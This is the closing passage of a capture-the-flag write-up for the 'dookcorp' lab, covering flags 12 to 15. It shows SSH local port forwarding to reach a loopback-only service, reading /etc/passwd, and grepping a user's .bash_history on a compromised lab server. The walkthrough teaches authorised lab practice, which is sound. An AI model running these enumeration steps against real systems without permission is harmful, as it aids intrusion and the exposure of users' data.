Port 8080 looks interesting, however it's only listening on the Desktop's loopback interface, so it's not directly accessible from our attacking host (our nmap scan of the Desktop showed only port 22). We could simply run curl or telnet against it from our SSH session on the Desktop, but I'd like to show you a neater way to attack this flag: SSH local port forwarding (`-L`), which makes the Desktop's local port 8080 appear as port 8080 on our attacking host. (Despite what I first called it, this is a local forward, not a reverse tunnel; a reverse tunnel, `-R`, would publish one of our ports on the remote side instead.)
First, we set up the forward.
```
root@omerta:~/offsec/ctf/dookcorp# ssh -L 8080:localhost:8080 frank@192.168.56.60
frank@192.168.56.60's password:
Welcome to Ubuntu 15.10 (GNU/Linux 4.2.0-16-generic i686)

 * Documentation:  https://help.ubuntu.com/

Last login: Tue May  3 21:47:05 2016 from 192.168.56.1
frank@dookcorp-desktop:~$
```
Now, from a second terminal on the attacking host, let's take a look at what answers on our end of the forward.
```
root@omerta:~/offsec/ctf/dookcorp# curl -is 127.0.0.1:8080
HTTP/1.1 200 OK
Host: 127.0.0.1:8080
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49

Flag12 = flag{MD5_REDACTED}
```
As easy as that.. Flag12 is ours.
Flag 13
“Frank emailed dook with this flags location.”… that’s our clue. Do you recall in Flag7 seeing an email from Frank to dook?
Let’s take a look at @dookcorp on twitter shall we.
Thanks for Flag13 @dookcorp.
Flag 14
Flag14 is a bonus flag made up of the first 2 digits of flags 1 through 10. No need for me to go through this one with you.
Flag 15
The final flag! Our hint: “Frank has this flag on the server”.
Let’s jump back onto the server and see what we can find.
First up, does frank exist on the server?
```
# cat /etc/passwd | grep frank
frank:x:1001:1001:,,,:/home/frank:/bin/bash
```
He certainly does.. let’s take a look at his home directory.
```
# cd /home/frank; ls -al
cd /home/frank; ls -al
total 28
drwxr-xr-x 3 frank frank 4096 Apr 26 16:14 .
drwxr-xr-x 4 root  root  4096 Apr 10 15:32 ..
-rw-rw-r-- 1 frank frank   60 Apr 20 20:33 .bash_history
-rw-r--r-- 1 frank frank  220 Apr 10 15:32 .bash_logout
-rw-r--r-- 1 frank frank 3760 Apr 10 15:32 .bashrc
drwx------ 2 frank frank 4096 Apr 20 20:32 .cache
-rw-r--r-- 1 frank frank  675 Apr 10 15:32 .profile
```
Nothing obvious straight off the bat, but .bash_history is 60 bytes and world-readable. Let's grep the dotfiles for the flag.
```
# grep -is flag .*
.bash_history:echo "Flag15 = flag{MD5_REDACTED}"
```
Cheers for Flag15 frank!
THE END
Wow! What a CTF!
For the new players in this space, I hope my overly explanatory way of writing up this CTF has helped you in some way and you have been able to learn something new.
Dook (@dookwit)!…thank you for taking the time to create such an awesome CTF, and cheers for letting me be your test bunny. Owe you a beer some time.
A big shout out to Sectalks Brisbane and all the sponsors that make each meet-up possible. If you haven’t been involved with SecTalks at this stage, do yourself a favour and come along to the next meet-up.
Until next time, tight lines and happy hacking.